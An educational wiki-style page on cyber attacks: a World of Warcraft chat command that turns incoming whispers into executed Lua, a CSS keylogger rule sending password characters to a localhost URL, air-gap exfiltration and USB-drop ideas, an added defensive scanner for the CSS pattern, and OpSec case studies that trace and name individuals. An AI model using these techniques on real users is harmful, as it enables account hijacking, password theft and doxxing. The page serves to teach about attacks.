Cyber Attacks

From Teach The Net

Novel Hacks

World of Warcraft: RemoveExtraSpaces

World of Warcraft supports interface add-ons written in the Lua scripting language, and because of this it exposes a rich API for those add-ons to use.

For this attack, the attacker must convince the player to enter a single command into their chat window:

/run RemoveExtraSpaces=RunScript

In this command, '/run' says to interpret what follows as a Lua script, 'RemoveExtraSpaces' is a built-in function that removes extra spaces from text, and 'RunScript' is a built-in function that executes text as a Lua script (similar to eval in JavaScript).

The function 'RemoveExtraSpaces' is called on every chat message the player receives, so the command above effectively causes every incoming chat message to be executed as though it were Lua script.

Now the attacker can simply whisper the victim player to make the victim's interface do anything he wishes, or to extract information about the player. He can, for example, extract the player's current in-game location from the UI, approach the player in game, open a trade with the player, and force the player's UI to press the accept button.


CSS Keylogger

Concept (repeat for every ASCII character):

input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
  • Works for password inputs that update the 'value' attribute with the typed-in value, a common pattern in React.
  • For password managers like LastPass, you can get the first character with [value^=a], the last character with [value$=a], and a character anywhere in the string with [value*=a]. One could target, for example, the first two and last two characters plus any in the middle with around 13,000 combinations.

Open Source Lib
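As an added example (not code from the original page or the linked library), a small stylesheet scanner for the pattern described above: it reports any rule whose selector matches on an input's value attribute with a prefix/suffix/substring operator and whose declaration loads a url(), since that combination is what turns each typed character into a distinct outbound request. The sample stylesheet is constructed for the demo; the localhost URLs mirror the page's own example.

```javascript
// Added example, not from the original page: flag the CSS-keylogger
// pattern in a stylesheet. A rule is reported when its selector matches
// on the "value" attribute with a substring operator (^=, $=, *=) and its
// declaration block loads a url(), which is what turns each typed character
// into a distinct outbound request. Pure text processing; runs offline.

function scanCssForKeylogger(cssText) {
  // Flat "selector { declarations }" pairs; nested @-rules are not handled.
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  const attrRe = /\[\s*value\s*([\^$*]=)\s*["']?([^"'\]]*)["']?\s*\]/i;
  const urlRe = /url\(\s*["']?([^"')\s]+)["']?\s*\)/i;
  const findings = [];
  let m;
  while ((m = ruleRe.exec(cssText)) !== null) {
    const selector = m[1].trim();
    const urlMatch = urlRe.exec(m[2]);
    if (!urlMatch) continue;               // no network fetch, no exfil
    const attrMatch = attrRe.exec(selector);
    if (!attrMatch) continue;              // not keyed on the input's value
    findings.push({
      selector,
      operator: attrMatch[1],              // "^=" prefix, "$=" suffix, "*=" anywhere
      needle: attrMatch[2],                // the character(s) being tested for
      url: urlMatch[1],
      targetsPassword: /\[\s*type\s*=\s*["']?password["']?\s*\]/i.test(selector),
    });
  }
  return findings;
}

// Constructed sample stylesheet: one benign image rule, two keylogger rules
// (one of them the page's own example), and one value selector with no url().
const SAMPLE_CSS = `
  .btn { background-image: url("https://cdn.example.com/btn.png"); }
  input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
  input[type="password"][value^="ab"] { background: url(http://localhost:3000/start/ab); }
  input[name="q"][value*="x"] { color: red; }
`;

for (const f of scanCssForKeylogger(SAMPLE_CSS)) {
  console.log(`${f.targetsPassword ? "PASSWORD" : "input"} value ${f.operator} "${f.needle}" -> ${f.url}`);
}
```

Running it over a site's bundled CSS (or over `document.styleSheets` text in a browser) surfaces exactly the rules a defender would want to review.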

Jumping Airgaps

Guri and his fellow Ben-Gurion researchers have shown, for instance, that it's possible to trick a fully offline computer into leaking data to another nearby device via the noise its internal fan generates, by changing air temperatures in patterns that the receiving computer can detect with thermal sensors, or even by blinking out a stream of information from a computer hard drive LED to the camera on a quadcopter drone hovering outside a nearby window. In new research published today, the Ben-Gurion team has even shown that they can pull data off a computer protected by not only an air gap, but also a Faraday cage designed to block all radio signals.
- Quoted from Schneier's blog, which quotes from here

Page with all research results

Overall concept:

  • Drop a USB drive with malware in a parking lot. An employee picks it up and plugs it into an air-gapped machine to see what's on it, infecting that machine.
  • Now there is an infected machine that is not connected to the internet; use one of the concepts above to exfiltrate its data.

OpSec Violations

Marcus Hutchins [Sept 2017]

Flipertyjopkins uploaded a video to YouTube 8 years ago instructing viewers how to use Hotmail cracker v1.3. Investigative journalist Brian Krebs notes that at the 2:48 mark in the video, an MSN chat window appears that clearly shows the user logged in as "[email protected]", thus linking Flipertyjopkins to Marcus Hutchins.


eBay Scammer [Sept 2016]

Person had a $500 Apple gift card and wanted to sell it for bitcoin because bitcoin has no chargebacks.

Several potential buyers all wanted it for 50% or less of the card's worth. Seller found one willing to pay 75% on the reddit darkmarket.

Seller sends the card numbers so the buyer can verify the balance, plus details on how to verify the seller's identity (a news article about the winner of a competition; clicking the blog post link in the article leads to the winner's blog; the blog's about-me page lists social usernames, one of which is the reddit account the communication is taking place on).

Buyer says the seller could have just bought that reddit account and insists on not going first; he says he has an eBay account with high positive feedback and will prove it. Seller says the buyer could have bought the eBay account; buyer replies he can't have, because eBay locks accounts out on geo/IP changes. Buyer sends the seller a message to prove he owns the high-reputation account.

Seller sends the PINs for the cards, a bitcoin address for payment, pictures of the cards hosted on his site, and a tracking number for the mailed cards.

Buyer deletes his reddit account to stop communication. Seller messages him on eBay; on eBay the buyer claims his account was hacked and it wasn't him.

Seller decides to track the buyer/scammer down. From the scammer's eBay account, the seller had a username and a city; from the scammer's reddit account, a username.

A Google search for the scammer's reddit and eBay usernames uncovered a Steam account that used both names, confirming it was not a hacked eBay account but the same person going by two nicknames. The Google search also uncovered a profile on a job-seeking website containing the scammer's first name, the first letter of his last name, and his city (which matched the one on eBay).

Seller had sent the buyer an image of the cards. The scammer opened it, which gave the seller the scammer's IP address and city (again matching the one on eBay).

Seller then did a Facebook search for the scammer's eBay username. In a text post by a random gamer, the seller sees the message "Good games last night on LoL <scammer_ebay_username>". Unfortunately the name was plain text rather than a link to a profile, because of the privacy settings of the tagged user.

Seller looked at this random gamer's profile, scrolled through 4 years of posts, and found a screenshot the gamer had posted with a League of Legends (LoL) scoreboard in the foreground AND Facebook chat open in the background, with the scammer's full name visible (matching the first name plus last initial the seller got from the job website). From this, the seller learned the scammer's full first and last name.

Seller then did a Facebook search for the scammer's last name and city, found the scammer's mother, and sent her a Facebook message.


vDos [Sept 2016]

An investigator was analyzing a random DDoS-for-hire site, PoodleStresser. He found a vulnerability that allowed downloading the site's config data. This data showed that PoodleStresser connects to the API of the DDoS-for-hire site vDos to power its attacks (so PoodleStresser is just a reseller of vDos).

vDos is a much larger site of the same ilk, hidden behind Cloudflare (so the site's true IP is not known). The config data downloaded from PoodleStresser gave the investigator API access to vDos. The investigator found a serious vulnerability in the vDos API that allowed dumping vDos' database and config files, as well as obtaining the true IP address of vDos (which pointed to four rented servers in Bulgaria at

From the dumped vDos database, all tech support tickets were extracted. From these tickets it was discovered that all attacks vDos clients attempted against Israel failed (suggesting the owners were in Israel and trying to avoid the attention of Israeli authorities). The vDos owners' online nicknames, P1st0 and AppleJ4ck, were also found in the support tickets.

From the extracted vDos config files, it was discovered that the site was configured to blast text messages to 6 phone numbers (two of them Israeli) whenever a high-level support ticket was created, via an online SMS service called Of the two Israeli phone numbers, one was tracked via Whitepages online to an Israeli named Yarden Bidani, while the other was connected via WHOIS records to the domain under the name Itay Huri. It was also discovered that the site was configured to send support emails to [email protected], [email protected] and [email protected]

A reverse IP lookup found several other sites running on the same IP as vDos. A WHOIS lookup on these domains found one of them registered to a phone number matching one of the numbers vDos' config files blasted text messages to.

A Google search for the owners' aliases (discovered in the tech support tickets) found listings they had made on places like, peddling warez and services.


KickAss Torrents [July 2016]

The feds tracked the owner of KAT through a variety of methods, though mostly by accessing bank and server records.

Possible angle: Client had a website, which the feds saw pointed to IP Address A reverse DNS lookup on showed several other domains hosted at the same IP address (many of which just proxied the main site). One of those other domains was old, and its whois record was not privacy protected and thus leaked the true owner's name, address, phone, and email. The email from this domain was used for an Apple account that purchased something on iTunes from a specific IP address (one not hidden behind a proxy). The same IP address was used by the person managing the Facebook page for KAT. A Coinbase account used to collect bitcoin donations was also tied to the same email address, and the bitcoin address behind that Coinbase account was the one listed on the KAT website for donations.

[Article 1, Article 2, Article 3]